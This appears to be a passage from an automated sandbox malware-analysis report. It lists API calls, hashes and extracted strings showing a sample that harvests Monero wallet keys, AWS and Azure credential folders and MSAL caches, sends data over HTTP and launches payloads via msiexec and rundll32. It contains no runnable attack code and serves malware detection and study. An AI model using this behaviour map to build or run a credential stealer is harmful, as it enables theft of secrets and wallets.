                        • InternetCloseHandle.WININET(00000000), ref: 00F05FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: 91e64e35f98ab3518a3ebc5980fed7e24923ac5ab14aa5546dc942e0ecdbe567
                        • Instruction ID: 837bdf136a1ca50f189e23ab2d4df1b0c5f76f0fda57bb8794af2a22b7d3413b
                        • Opcode Fuzzy Hash: 91e64e35f98ab3518a3ebc5980fed7e24923ac5ab14aa5546dc942e0ecdbe567
                        • Instruction Fuzzy Hash: 7E122F71821118ABDB15EBA0DC95FEEB378BF14710F4041A9B10663091EF786BCAEF65
                        Function 00F0CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F0CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F0D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F0D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D208
                        • lstrcat.KERNEL32(?,00F21478), ref: 00F0D217
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D22A
                        • lstrcat.KERNEL32(?,00F2147C), ref: 00F0D239
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D24C
                        • lstrcat.KERNEL32(?,00F21480), ref: 00F0D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D26E
                        • lstrcat.KERNEL32(?,00F21484), ref: 00F0D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D290
                        • lstrcat.KERNEL32(?,00F21488), ref: 00F0D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D2B2
                        • lstrcat.KERNEL32(?,00F2148C), ref: 00F0D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 00F0D2D4
                        • lstrcat.KERNEL32(?,00F21490), ref: 00F0D2E3
                          • Part of subcall function 00F1A820: lstrlen.KERNEL32(00F04F05,?,?,00F04F05,00F20DDE), ref: 00F1A82B
                          • Part of subcall function 00F1A820: lstrcpy.KERNEL32(00F20DDE,00000000), ref: 00F1A885
                        • lstrlen.KERNEL32(?), ref: 00F0D32A
                        • lstrlen.KERNEL32(?), ref: 00F0D339
                          • Part of subcall function 00F1AA70: StrCmpCA.SHLWAPI(008A98B0,00F0A7A7,?,00F0A7A7,008A98B0), ref: 00F1AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 00F0D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 15953f440051f5ad25154899d1fe01a6dfd50ece17e38b85b8776f7dcd14dca9
                        • Instruction ID: 570d6f34e38d72a6a4d0752208195e112c6980659ed3e248e0aa7942dd380b07
                        • Opcode Fuzzy Hash: 15953f440051f5ad25154899d1fe01a6dfd50ece17e38b85b8776f7dcd14dca9
                        • Instruction Fuzzy Hash: 4AE163758411089BDB18FBA0ED96EEE7378FF14711F104068F117A7091DE39AE86EB62
                        Function 00F0C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008AD5F0,00000000,?,00F2144C,00000000,?,?), ref: 00F0CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F0CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00F0CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F0CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F0CAD9
                        • StrStrA.SHLWAPI(?,008AD6E0,00F20B52), ref: 00F0CAF7
                        • StrStrA.SHLWAPI(00000000,008AD650), ref: 00F0CB1E
                        • StrStrA.SHLWAPI(?,008AE1B8,00000000,?,00F21458,00000000,?,00000000,00000000,?,008A9940,00000000,?,00F21454,00000000,?), ref: 00F0CCA2
                        • StrStrA.SHLWAPI(00000000,008AE078), ref: 00F0CCB9
                          • Part of subcall function 00F0C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F0C871
                          • Part of subcall function 00F0C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F0C87C
                        • StrStrA.SHLWAPI(?,008AE078,00000000,?,00F2145C,00000000,?,00000000,008A9780), ref: 00F0CD5A
                        • StrStrA.SHLWAPI(00000000,008A9AB0), ref: 00F0CD71
                          • Part of subcall function 00F0C820: lstrcat.KERNEL32(?,00F20B46), ref: 00F0C943
                          • Part of subcall function 00F0C820: lstrcat.KERNEL32(?,00F20B47), ref: 00F0C957
                          • Part of subcall function 00F0C820: lstrcat.KERNEL32(?,00F20B4E), ref: 00F0C978
                        • lstrlen.KERNEL32(00000000), ref: 00F0CE44
                        • CloseHandle.KERNEL32(00000000), ref: 00F0CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: c38e4034d6eac2d76ecc8d95c3a0a4987918262483a3f5771d507bfa3b551d4a
                        • Instruction ID: 79b4607ae711725ec333c115f8f668771e28c08811d4f3e0b69a89e05bf6c55e
                        • Opcode Fuzzy Hash: c38e4034d6eac2d76ecc8d95c3a0a4987918262483a3f5771d507bfa3b551d4a
                        • Instruction Fuzzy Hash: B4E10E71D01108ABDB18EBA0DD92FEEB778AF14710F404169F10767191EF396ACADBA1
                        Function 00F18320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • RegOpenKeyExA.ADVAPI32(00000000,008ABB40,00000000,00020019,00000000,00F205B6), ref: 00F183A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F18426
                        • wsprintfA.USER32 ref: 00F18459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F1847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F1848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00F18499
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 60584a9abf346077c22e5150ee3244d86572c43d6f491537b01863d76b530403
                        • Instruction ID: 9d8e24c560d28c4c7e9f4fb3749964aab54333cee71499addbad6ef1c316d040
                        • Opcode Fuzzy Hash: 60584a9abf346077c22e5150ee3244d86572c43d6f491537b01863d76b530403
                        • Instruction Fuzzy Hash: 8E811C75951118ABEB28DB50DD91FEAB7B8FF48710F008298E10AA6180DF756FC6DF90
                        Function 00F14D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F18E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00F14DCD
                          • Part of subcall function 00F14910: wsprintfA.USER32 ref: 00F1492C
                          • Part of subcall function 00F14910: FindFirstFileA.KERNEL32(?,?), ref: 00F14943
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00F14E59
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F20FDC), ref: 00F14971
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F20FE0), ref: 00F14987
                          • Part of subcall function 00F14910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F14B7D
                          • Part of subcall function 00F14910: FindClose.KERNEL32(000000FF), ref: 00F14B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00F14EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F14EE5
                          • Part of subcall function 00F14910: wsprintfA.USER32 ref: 00F149B0
                          • Part of subcall function 00F14910: StrCmpCA.SHLWAPI(?,00F208D2), ref: 00F149C5
                          • Part of subcall function 00F14910: wsprintfA.USER32 ref: 00F149E2
                          • Part of subcall function 00F14910: PathMatchSpecA.SHLWAPI(?,?), ref: 00F14A1E
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,008AF2A8), ref: 00F14A4A
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,00F20FF8), ref: 00F14A5C
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,?), ref: 00F14A70
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,00F20FFC), ref: 00F14A82
                          • Part of subcall function 00F14910: lstrcat.KERNEL32(?,?), ref: 00F14A96
                          • Part of subcall function 00F14910: CopyFileA.KERNEL32(?,?,00000001), ref: 00F14AAC
                          • Part of subcall function 00F14910: DeleteFileA.KERNEL32(?), ref: 00F14B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 11b84b4a78639188fbbc029aec3309e005f95f6f66da57e6dd38827aa649b195
                        • Instruction ID: 9e98816291579fd3cf2319167cb6a518a3e9fc6b7ef977d5a0975c4da1ad21da
                        • Opcode Fuzzy Hash: 11b84b4a78639188fbbc029aec3309e005f95f6f66da57e6dd38827aa649b195
                        • Instruction Fuzzy Hash: E641A6BA94021467DB24F770FC47FED3738AB64700F404454B646660C1EEB99BD9EB92
                        Function 00F19010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F1906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 1fa38d7c4cb2870998e4f79864fca33de63c303c46596eb9c4229ca7a4bb015c
                        • Instruction ID: a42f1afa45231dd7bf3602c0bfbb14c3ccc2643e61c857d8a6e5efb6a27f5f60
                        • Opcode Fuzzy Hash: 1fa38d7c4cb2870998e4f79864fca33de63c303c46596eb9c4229ca7a4bb015c
                        • Instruction Fuzzy Hash: 42711075940208ABDB18DFE4EC99FEEB7B8FF48701F108118F516A7284DB74A985DB60
                        Function 00F12E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F131C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F1335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F134EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: 0332d2d44c7c5795813932c06444fd83978ef5d4079f39ba738e29670f6cce5f
                        • Instruction ID: ae9f558b8f834ee52385a7b266e489dde0b986e484a78bd9849471c5c58fa7fc
                        • Opcode Fuzzy Hash: 0332d2d44c7c5795813932c06444fd83978ef5d4079f39ba738e29670f6cce5f
                        • Instruction Fuzzy Hash: 101210718011089ADB19FBA0DD92FEDB738AF14320F504159F50666191EF386BCBEFA2
                        Function 00F152C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F06280: InternetOpenA.WININET(00F20DFE,00000001,00000000,00000000,00000000), ref: 00F062E1
                          • Part of subcall function 00F06280: StrCmpCA.SHLWAPI(?,008AF278), ref: 00F06303
                          • Part of subcall function 00F06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F06335
                          • Part of subcall function 00F06280: HttpOpenRequestA.WININET(00000000,GET,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F06385
                          • Part of subcall function 00F06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F063BF
                          • Part of subcall function 00F06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F063D1
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F15318
                        • lstrlen.KERNEL32(00000000), ref: 00F1532F
                          • Part of subcall function 00F18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F18E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00F15364
                        • lstrlen.KERNEL32(00000000), ref: 00F15383
                        • lstrlen.KERNEL32(00000000), ref: 00F153AE
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
